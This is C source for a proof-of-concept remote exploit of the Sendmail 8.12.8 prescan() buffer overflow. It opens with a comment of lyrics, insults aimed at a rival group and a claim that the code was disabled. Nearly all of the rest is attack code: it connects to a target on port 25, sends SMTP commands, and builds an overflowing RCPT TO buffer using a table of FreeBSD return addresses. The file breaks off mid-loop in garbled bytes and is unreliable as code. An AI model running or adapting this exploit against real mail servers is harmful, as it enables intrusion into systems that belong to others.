/* * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin * And no i'm not in l33tsecurity * * AND I'M NOT GOBBLES! * * -- * my reflection, dirty mirror * there's no connection to myself * i'm your lover. i'm your zero * i'm the face in your dreams of glass * so save your prayers for when we're really gonna need 'em * throw out your cares and fly * wanna go for a ride? * -- * * This exploit is proof of concept, It has been edited ***NOT*** to work. * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable. * On sucessful POC exploitation the program should crash with the following: * * Program received signal SIGSEGV, Segmentation fault. * 0x5c5c5c5c in ?? () * * Alright so the last sendmail exploit wasnt very good, dont blame me * it wasnt exploitable cause of that god damn second buffer kept * getting in the way. Fuck it. * * This would not work on linux cause the offset for addr was someshit like * 0xbfffb9c9 and sendmail doesnt allow certain characters like 0xff to be * written to the buffer. Bsd on the other hand has an offset of someshit like * 0xbfbfdad1, which is fine. * {"Red Hat 7.3",88,120,0xbfffb9c9} // wont work :( * * And fuck you PHC you no talent bunch of fucking script kiddies. You'll * fucking shit your pants when you see a real hacker in action. No I dont * rip code, but you bitchs cant tell a piece of code from an apple pie, * so shut the fuck up. * */ #include #include #include #include #include #include #include #include #include int maxarch=1; struct arch { char *os; // The OS int pos; // The position of ebp in the stack, with the last byte being 0x00 int apos; // The amount of bytes after pvpbuf where ebp is located unsigned long addr; // The pointer to the addr buffer } archs[] = { {"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1}, }; ///////////////////////////////////////////////////////// #define BUFSIZE 50096 void header() { printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n"); } void printtargets() { unsigned long i; header(); printf("\t Target\t Addr\t\t OS\n"); printf("\t-------------------------------------------\n"); for (i=0;i \n",argv[0]); printtargets(); return 0; } target=atol(argv[2]); if (target < 0 || target >= maxarch) { printtargets(); return 0; } header(); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Unable to create socket\n"); exit(0); } server.sin_family = AF_INET; server.sin_port = htons(25); printf("Resolving address... "); fflush(stdout); if ((ipaddr = inet_addr(argv[1])) == -1) { struct hostent *hostm; if ((hostm=gethostbyname(argv[1])) == NULL) { printf("Unable to resolve address\n"); exit(0); } memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); } else server.sin_addr.s_addr = ipaddr; memset(&(server.sin_zero), 0, 8); printf("Address found\n"); printf("Connecting... "); fflush(stdout); if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) { printf("Unable to connect\n"); exit(0); } printf("Connected\n"); printf("Sending exploit... \n"); fflush(stdout); readsocket(sock,220); writesocket(sock,"HELO yahoo.com\r\n"); readsocket(sock,250); writesocket(sock,"MAIL FROM: \r\n"); readsocket(sock,250); memset(buf,0,sizeof(buf)); strcpy(buf,"RCPT TO: "); p=buf+strlen(buf); for (i=1,j=0,m=0;i<1242;i++) { if (!(i%256)) { *p++=';'; j++; } else { if (j < 4) *p++='A'; else { if (m == archs[target].pos) pos=p; //if (m > archs[target].pos) *p++='B'; else *p++='A'; m++; } } } if (pos) memcpy(pos,(char*)&archs[target].addr,4); *p++=';'; for (i=0;i

��ŷ��